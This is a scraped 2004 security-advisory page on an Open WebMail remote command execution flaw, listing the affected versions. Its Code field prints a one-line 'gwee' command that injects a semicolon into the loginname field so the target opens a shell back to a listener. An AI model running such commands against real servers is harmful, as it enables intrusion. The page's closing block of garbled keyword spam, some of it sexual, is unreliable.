exploits , vulnerabilities , articles , Open WebMail Remote Command Execution Variant Vulnerability

Title	Open WebMail Remote Command Execution Variant Vulnerability
Published	2004-05-10-12:00AM
Updated	2004-05-10-05:47PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of this vulnerability has been credited to Nullbyte and Syscalls.
Vulnerable	Open Webmail Open Webmail 2.30 Open Webmail Open Webmail 2.21 Open Webmail Open Webmail 2.20 Open Webmail Open Webmail 1.90 Open Webmail Open Webmail 1.81 Open Webmail Open Webmail 1.71 Open Webmail Open Webmail 1.8 Open Webmail Open Webmail 1.7 Open Webmail Open Webmail current
Not Vulnerable
Code	There is no exploit required. However it is reported that several exploits are in public circulation, additionally it has been demonstrated that 'gwee' (http://cycom.se/dl/gwee), can be used as follows to exploit the issue: $ gwee -L -y'loginname=%3B' -llocalhost -p31337 http://www.example.com/cgi-bin/openwebmail/userstat.pl
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 13:19:10 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.google 200 /compo masa Www indian www.lexsen index+vuln Free nayan news for c loblains s www.taboo getdatabac 17to.18gir Www indian asian n.../p2_ne news searc 200 /compo saxygarls Free sex C npds xxxxxs Free xxx i Antarvasna C...exyblo Free blowj exim 4.643 www.uggboo Xxx vedios all cartoo news for c www.syxq8. Www...300 www.huncit kopete www.gabion 20829.php wwwsxe com CMS is Fre www.transs SexyMoves www.lvovl. Womansexan Wwwpussy.c news searc 434893750. sXe Injec mambo Remo aljazera t Rani .com Windows SP